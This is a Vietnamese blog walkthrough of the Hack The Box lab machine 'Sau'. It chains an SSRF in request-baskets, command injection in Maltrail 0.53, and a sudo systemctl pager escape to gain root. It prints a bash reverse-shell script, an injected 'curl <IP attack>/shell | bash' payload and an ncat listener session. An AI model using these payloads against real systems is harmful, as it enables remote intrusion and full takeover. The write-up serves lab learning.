Sau

byDryu8 2 min read
0

 

Enumeration

Zenmap:

Kiểm tra website trên port 55555
Tìm kiếm các vuln về website Basket: Server-Side Request Forgery CVE-2023-27163
Thực hiện khai thác:
PS D:\thehackbox\Machines\Sau> curl.exe --location 'http://sau.htb:55555/api/baskets/yu8' --header 'Content-Type: application/json' --data '{\"forward_url\": \"http://127.0.0.1:80/\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}'
{"token":"p9irXIdjY5vH7oVZ0CcPOO5xG0c5CmdIxUGuK7Fv2bnD"}
PS D:\thehackbox\Machines\Sau>
Truy cập link web vừa tạo:

Gaining access puma

Tôi thấy đây là một website Maltrail version 0.53. Tìm kiếm lỗ hổng về website này: Unauthenticated OS Command Injection in stamparm/maltrail
Thực hiện khai thác như sau:
PS D:\thehackbox\Machines\Sau> curl.exe --location 'http://sau.htb:55555/api/baskets/dryu8' --header 'Content-Type: application/json' --data '{\"forward_url\": \"http://127.0.0.1:80/login\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}'
{"token":"GUxRlncBqnKH-euFg84q4dTe9AIpNO890bqke0UGzKaY"}
PS D:\thehackbox\Machines\Sau>
Sau khi tạo website:
PS D:\thehackbox\Machines\Sau> more .\shell
#!/bin/bash
bash -i >& /dev/tcp/<IP attack>/8888 0>&1
PS D:\thehackbox\Machines\Sau> python  -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.**.** - - [09/Jul/2023 02:55:32] "GET /shell HTTP/1.1" 200 -

#-----------------------------------
PS D:\thehackbox\Machines\Sau> curl.exe "http://sau.htb:55555/dryu8" --data 'username=;`curl <IP attack>/shell | bash`'

#-----------------------------------
PS D:\thehackbox\Machines\Sau> ncat.exe -l 8888
bash: cannot set terminal process group (869): Inappropriate ioctl for device
bash: no job control in this shell
puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ whoami
whoami
puma
puma@sau:/opt/maltrail$

Privilege escalation

puma@sau:/opt/maltrail$ script /dev/null /bin/bash
script /dev/null /bin/bash
Script started, file is /dev/null
puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
!sshh!sh
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)
#

Không có nhiều thách thức trong máy này. Chán thật.
4.94 / 169 rates
Dryu8

Dryu8 is just a newbie in pentesting and loves to drink beer. I will be happy if you can donate me with a beer.

Post a Comment

Previous Post Next Post